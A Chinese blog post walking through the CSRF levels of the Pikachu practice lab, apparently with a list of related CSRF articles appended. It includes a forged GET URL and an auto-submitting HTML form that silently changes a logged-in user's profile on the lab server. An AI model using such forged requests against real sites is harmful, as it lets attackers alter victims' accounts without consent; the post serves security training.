3. CSRF

最新推荐文章于 2025-08-16 06:13:53 发布
最新推荐文章于 2025-08-16 06:13:53 发布
阅读量275 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: pikachu通关练习 文章标签: csrf 前端 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_41826065/article/details/128237931

CSRF

1.CSRF(get)

1.1 根据提示登陆系统

在这里插入图片描述

1.2 修改个人信息,提交时进行抓包

在这里插入图片描述

1.3 根据数据包伪造地址

http://124.220.31.77:8000/vul/csrf/csrfget/csrf_get_edit.php?sex=1&phonenum=11&add=1&email=1&submit=submit

在这里插入图片描述

1.4 修改成功

在这里插入图片描述

2.CSRF (post)

2.1 修改个人信息时进行抓包

在这里插入图片描述

2.2 新建html文件,创建表单

在这里插入图片描述

<!DOCTYPE html>
<html>
<head lang="en">
	<title>csrf_post</title>
	<script>
    window.onload = function() {
    document.getElementById("postsubmit").click();
  }
 </script>
</head>
<body>
       <form action="http://124.220.31.77:8000/vul/csrf/csrfpost/csrf_post_edit.php"  method="POST">
       	 <input type="text" name="sex" value="1"><br>
       	 <input type="hidden" name="phonenum" value="hacker"><br>
       	 <input type="hidden" name="add" value="china"><br>
       	 <input type="hidden" name="email" value="hacker"><br>
       	 <input id="postsubmit" type="submit" name="submit" value="submit" />
       </form>
</body>

</html>

2.3 在登陆时,打开此html,修改成功

在这里插入图片描述

4.3. CSRF
Sumarua的博客
07-02 1249
文章目录4.3. CSRF4.3.1. 简介4.3.2. 分类4.3.2.1. 资源包含4.3.2.2. 基于表单4.3.2.3. XMLHttpRequest4.3.3. 防御4.3.4. 参考链接 4.3. CSRF 4.3.1. 简介 CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内
DVWA靶机通关系列--3.CSRF(跨站点请求伪造)(解题思路+审计分析)
ElsonHY的博客
12-14 662
DVWA靶机通关系列--3.CSRF(跨站点请求伪造)(解题思路+审计分析)前言0x01 CSRF(跨站点请求伪造)CLASS LOWCLASS:MEDIUMCLASS:HIGH总结 前言 这时肯定有小伙伴要说了,“哎呀你怎么第二关的命令注入还没讲就直接讲第三关了???小R你不讲5的,我劝你耗子尾汁……” 开个玩笑,因为最近面试经常被问到关于CSRF的问题,也重新对该部分的理论基础复习了一下,想着趁热打铁,先写这一部分,这样写的过程思路也可能会相对清晰一点,下一篇一定写第二关= =(狗头保命)。 B
Spring Security 自定义登录页并开启CSRF防御,http.csrf()源码分析
weixin_45114101的博客
12-26 2572
Spring Security 自定义登录页并开启CSRF防御,http.csrf()源码分析
Docker Tomcat 部署War, Manager 管理员账号和密码设置,org.apache.catalina.filters.CSRF_NONCE
faceqq的博客
07-07 1160
docs examples host-manager manager 2. pull拉取镜像 3. 直接运行镜像版本如果本地没有会自动拉取,可以忽略2 –rm 容器停止的时候自动删除,这里我们不加–rm 参数如果有配置需要修改需要提交容器,则不能让容器在停止的时候删除。 –name 指定容器的名称 -p 8080:8080 映射宿主机8080 到容器8080 此时是不能访问manager的,根据上面的提示在conf的 tomcat-user.xml下配置访问用户 5. 进入容器修改t
Exercise:1.CSRF漏洞场景复现 2.场景测试 3.CSRF与XSS 相结合
lay77的博客
08-28 667
1. CSRF 漏洞场景复现 2. CSRF 漏洞验证 3. CSRF 与XSS 相结合
Django 中CSRF中间件 'django.middleware.csrf.CsrfViewMiddleware',
weixin_33971130的博客
04-03 756
1、Django中CSRF中间件的工作原理及form表单提交需要添加{% csrf_token %}防止出现403错误 CSRF # 表示django全局发送post请求均需要字符串验证功能:防止跨站请求伪造的功能工作原理:客户端访问服务器端,在服务器端正常返回给客户端数据的时候,而外返回给客户端一段字符串,等到客户端下次访问服务器端时,服务器端会到客户端查找先前返回的字符串,如果找到则继续,找...
security CSRF漏洞保护
程序员一博
08-01 1049
跨站请求伪造或者一键式攻击通常缩写为csrf或者xsrf,通过挟持当前浏览器已经登录用户发送恶意请求的攻击烦方法xss利用用户对网站的信任csrf利用网站对用户浏览器的信任举例。
235. CSRF 防护机制
weixin_43484713的博客
06-07 999
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种恶意攻击方式,攻击者通过诱导受害者访问特定页面或点击恶意链接,利用受害者在目标网站(如银行、社交平台等)已登录的合法身份,伪造用户请求执行非预期的操作。这种攻击的本质是冒用用户身份,而非直接窃取数据。CSRF(跨站请求伪造):攻击者诱导用户在已登录目标网站的情况下,执行非预期的操作(如转账、修改密码等)。攻击利用的是用户对目标网站的信任。XSS(跨站脚本攻击)
CSRF的原理及防御
qq3416518976的博客
09-26 1185
关于CSRF的反制
29.CSRF及SSRF漏洞案例讲解
mingyqf的博客
12-30 3856
CSRF&SSRF】—漏洞案例讲解—day29 一、CSRF—跨站请求伪造攻击 1、解释 CSRF漏洞解释,原理 CSRF(Cross-site request forgery) 跨站请求伪造,由客户端发起,是一种劫持受信任用户向服务器发送非预期请求的攻击方式,与XSS相似,但比XSS更难防范,常与XSS一起配合攻击 原理详解 攻击者盗用了你的身份信息,以你的名义发送恶意请求,对服务器来说这个请求是你发起的,却完成了攻击者所期望的一个操作 XSS 利用站点内内的信任用户,盗取cookie CS
详解利用django中间件django.middleware.csrf.CsrfViewMiddleware防止csrf攻击
09-20
Django框架提供了一个内置的中间件`django.middleware.csrf.CsrfViewMiddleware`来帮助开发者防范这种攻击。 **一、Django后台处理** 1. **启用CSRF保护中间件**: 在Django项目的`settings.py`文件中,你需要...
springboot mysecurity vue3 前后端项目 .csrf().disable()要这样设置吗
04-03
.csrf(csrf -> csrf.disable()) // Lambda风格配置 .authorizeHttpRequests(auth -> auth .requestMatchers("/api/**").permitAll() .anyRequest().authenticated() ); return http.build(); } ``` --- ### ...
打靶日常-CSRF
m0_74042991的博客
08-14 162
csrf的小皮与dvwa的练习题,后序更新
CSRF 攻击
wa_ka_ka的博客
08-12 961
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web安全攻击手段。攻击者通过诱骗用户在已登录的Web应用中执行非本意操作,从而以用户身份执行恶意请求(如转账、改密码等)。fill:#333;1. 正常登录(获得Cookie)2. 访问恶意页面3. 自动发送伪造请求(携带用户Cookie)4. 执行恶意操作。
electron进程间通信- 从渲染进程到主进程
唐璜Taro的博客
08-13 1041
本文介绍了Electron中的IPC进程间通信机制,重点解析了从渲染进程到主进程的单向通信实现方式。这种设计既保证了功能实现,又遵循了Electron的安全通信原则,是开发桌面应用的常用模式。
基于SpringBoot校园管理系统
2501_90968670的博客
08-13 1260
校园管理系统是一个基于Spring Boot + Vue.js的全栈应用,专注于高校内部的多角色协作管理。系统实现了院校管理、单位管理、用户管理、通知推送、投票管理等功能模块,满足管理员、院校管理员、普通用户三类角色的不同操作需求。核心目标是提升校园管理效率,实现通知精准推送与数据可视化统计。
HTML 框架:构建网页布局的基石
最新发布
froginwe11的博客
08-16 154
HTML 框架是一种网页布局技术,它允许开发者将网页划分为多个区域,并对这些区域进行精细的控制。通过使用框架,可以轻松实现网页的标题、导航栏、页脚等部分的布局,提高网页的可用性和用户体验。HTML 框架是网页设计中不可或缺的一部分,它为网页布局提供了强大的支持。通过了解 HTML 框架的种类、应用以及如何使用它们,开发者可以创建更加美观、易用的网页。
后端Web实战-MySQL数据库
sjdjjdkd的博客
08-13 973
MySQL官方提供了两个版本:商业版本(MySQL Enterprise Edition)该版本是收费的,我们可以使用30天。官方会提供对应的技术支持。社区版本(MySQL Community Server)该版本是免费的,但是MySQL不会提供任何的技术支持。本课程,采用的是MySQL的社区版本(8.0.34)1.SQL语句可以单行或者多行书写,以分号结尾。2、SQL语句可以使用空格/缩进来增强语句的可读性。3、MySQL数据库的SQL语句不区分大小写。
前端八股文面试题】【JavaScript篇8】作用域链介绍?
qq_45974648的博客
08-13 431
JavaScript作用域链解析:作用域链是变量查找的层级规则,决定代码如何访问变量和函数。其核心逻辑为:从当前作用域开始查找,逐层向外直到全局作用域。函数定义时即确定作用域链(词法作用域),与调用位置无关。闭包是作用域链的典型应用,内部函数可访问外部函数变量。作用域链由函数作用域、块级作用域(ES6+)和全局作用域构成,理解其机制有助于避免变量冲突,是掌握闭包、模块化等高级概念的基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值